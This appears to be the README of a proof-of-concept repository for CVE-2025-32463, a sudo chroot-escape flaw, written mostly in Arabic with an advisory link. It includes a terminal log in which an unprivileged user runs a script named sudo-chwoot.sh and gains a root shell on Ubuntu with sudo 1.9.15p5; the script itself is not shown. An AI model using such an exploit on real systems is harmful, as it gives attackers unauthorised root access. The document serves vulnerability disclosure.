
استغلال إثبات المفهوم لـ CVE-2025-32463، ثغرة هروب من chroot في sudo، تسمح للمستخدمين غير المميزين بالحصول على قشرة جذر خارج بيئة chroot.
Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
تؤدي تنفيذ PoC على خادم Ubuntu 24.04.2 LTS مع Sudo v1.9.15p5، باستخدام مستخدم غير مميز وبدون قواعد Sudo محددة، إلى الحصول على غلاف جذر (root shell) خارج البيئة المعزولة (chrooted).
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)